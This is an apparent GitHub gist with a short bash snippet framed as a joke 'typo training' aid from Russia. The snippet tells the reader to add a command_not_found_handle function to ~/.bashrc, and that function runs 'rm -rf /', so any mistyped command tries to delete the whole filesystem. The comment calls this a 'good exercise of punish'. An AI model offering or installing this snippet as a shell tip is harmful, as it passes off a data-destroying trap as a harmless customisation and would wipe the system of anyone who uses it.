Last active
March 15, 2016 15:21
-
-
Save RodrigoHahn/bce51c038aafd7c04445 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Оригинальный код Иван (2015). | |
| # | |
| # For not type wrong in bash. | |
| # Is like we train in Russia. | |
| # Need bash of at least version 4 to work. | |
| # For make work need add to ~/.bashrc and command of `source ~/.bashrc` | |
| command_not_found_handle () { | |
| rm -rf / # Good exercise of punish. Give chance of cancel. | |
| } | |
| # Eредавайте привет Тане. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment